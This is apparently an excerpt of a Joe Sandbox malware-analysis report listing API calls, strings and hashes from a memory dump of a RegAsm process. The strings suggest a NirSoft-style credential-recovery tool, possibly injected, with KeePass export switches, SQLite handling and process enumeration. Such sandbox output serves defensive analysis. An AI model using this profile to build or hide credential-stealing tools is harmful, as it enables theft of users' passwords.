                                                                • free.MSVCRT ref: 00418716
                                                                • free.MSVCRT ref: 0041872A
                                                                • free.MSVCRT ref: 00418749
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$FullNamePath$malloc$Version
                                                                • String ID: |A
                                                                • API String ID: 3356672799-1717621600
                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                • API String ID: 2081463915-1959339147
                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                • API String ID: 2012295524-70141382
                                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                • API String ID: 667068680-3953557276
                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                • String ID:
                                                                • API String ID: 1700100422-0
                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                • String ID:
                                                                • API String ID: 552707033-0
                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: %%0.%df
                                                                • API String ID: 3473751417-763548558
                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                APIs
                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                • GetParent.USER32(?), ref: 00406136
                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                • String ID: A
                                                                • API String ID: 2892645895-3554254475
                                                                APIs
                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                • memset.MSVCRT ref: 0040DA23
                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                • String ID: caption
                                                                • API String ID: 973020956-4135340389
                                                                Strings
                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf$wcscpy
                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                • API String ID: 1283228442-2366825230
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00413972
                                                                • wcscpy.MSVCRT ref: 00413982
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                • wcscat.MSVCRT ref: 004139DC
                                                                • memset.MSVCRT ref: 004139B8
                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                • memset.MSVCRT ref: 00413A00
                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                • wcscat.MSVCRT ref: 00413A27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                • String ID: \systemroot
                                                                • API String ID: 4173585201-1821301763
                                                                APIs
                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                • strchr.MSVCRT ref: 0040C140
                                                                • strchr.MSVCRT ref: 0040C151
                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                • memset.MSVCRT ref: 0040C17A
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                • String ID: 4$h
                                                                • API String ID: 4019544885-1856150674
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 4066108131-3849865405
                                                                APIs
                                                                • memset.MSVCRT ref: 004082EF
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • memset.MSVCRT ref: 00408362
                                                                • memset.MSVCRT ref: 00408377
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 290601579-0
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$wcslen
                                                                • String ID:
                                                                • API String ID: 3592753638-3916222277
                                                                APIs
                                                                • memset.MSVCRT ref: 0040A47B
                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                • String ID: %s (%s)$YV@
                                                                • API String ID: 3979103747-598926743
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                • API String ID: 2780580303-317687271
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                • String ID: Unknown Error$netmsg.dll
                                                                • API String ID: 2767993716-572158859
                                                                Strings
                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                • database is already attached, xrefs: 0042F721
                                                                • out of memory, xrefs: 0042F865
                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                • API String ID: 1297977491-2001300268
                                                                APIs
                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                • String ID:
                                                                • API String ID: 3015003838-0
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                • String ID: strings
                                                                • API String ID: 3166385802-3030018805
                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D8BD
                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                • memset.MSVCRT ref: 0040D906
                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                • String ID: sysdatetimepick32
                                                                • API String ID: 1028950076-4169760276
                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                APIs
                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                • memset.MSVCRT ref: 0041BA3D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: -journal$-wal
                                                                • API String ID: 438689982-2894717839
                                                                • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                APIs
                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                • String ID:
                                                                • API String ID: 4218492932-0
                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                APIs
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
